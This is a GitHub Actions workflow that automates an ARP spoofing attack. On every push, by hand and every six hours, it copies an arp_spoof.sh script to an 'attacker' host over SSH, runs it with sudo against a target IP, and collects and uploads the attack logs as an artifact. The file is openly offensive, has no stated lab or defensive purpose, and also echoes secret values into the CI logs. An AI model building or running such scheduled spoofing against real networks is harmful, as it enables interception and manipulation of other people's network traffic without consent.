name: ARP Spoofing Automation

on:
  push:
    branches: [ main ]
  workflow_dispatch:  # Allows manual trigger
  schedule:
    - cron: '0 */6 * * *'  # Run every 6 hours

jobs:
  run-arp-spoof:
    runs-on: ubuntu-latest
    
    env:
      ATTACKER_IP: ${{ secrets.ATTACKER_IP }}
      TARGET_IP: ${{ secrets.TARGET_IP }}
      SSH_PRIVATE_KEY: ${{ secrets.SSH_PRIVATE_KEY }}
      
    steps:
      - name: Checkout repository
        uses: actions/checkout@v4

      - name: Debug Environment Variables
        run: |
          echo "Attacker IP: ${{ secrets.ATTACKER_IP }}"
          echo "Target IP: ${{ secrets.TARGET_IP }}"

      - name: Check if attacker machine is reachable
        run: |
          ping -c 4 $ATTACKER_IP

      - name: Set up SSH key
        run: |
          mkdir -p ~/.ssh
          echo "$SSH_PRIVATE_KEY" > ~/.ssh/id_rsa
          chmod 600 ~/.ssh/id_rsa
          

      - name: Deploy attack script to attacker machine
        run: |
          scp -v arp_spoof.sh rb@$ATTACKER_IP:/home/rb/
          ssh -v rb@$ATTACKER_IP "chmod +x /home/rb/arp_spoof.sh"


      - name: Execute ARP spoofing attack
        run: |
          ssh rb@$ATTACKER_IP "sudo /home/rb/arp_spoof.sh $TARGET_IP"

      - name: Collect and store results
        run: |
          ssh rb@$ATTACKER_IP "cat /home/rb/arp_attack_logs.txt" > attack_results.txt
          
      - name: Upload attack results
        uses: actions/upload-artifact@v4
        with:
          name: arp-spoof-results
          path: attack_results.txt
          retention-days: 5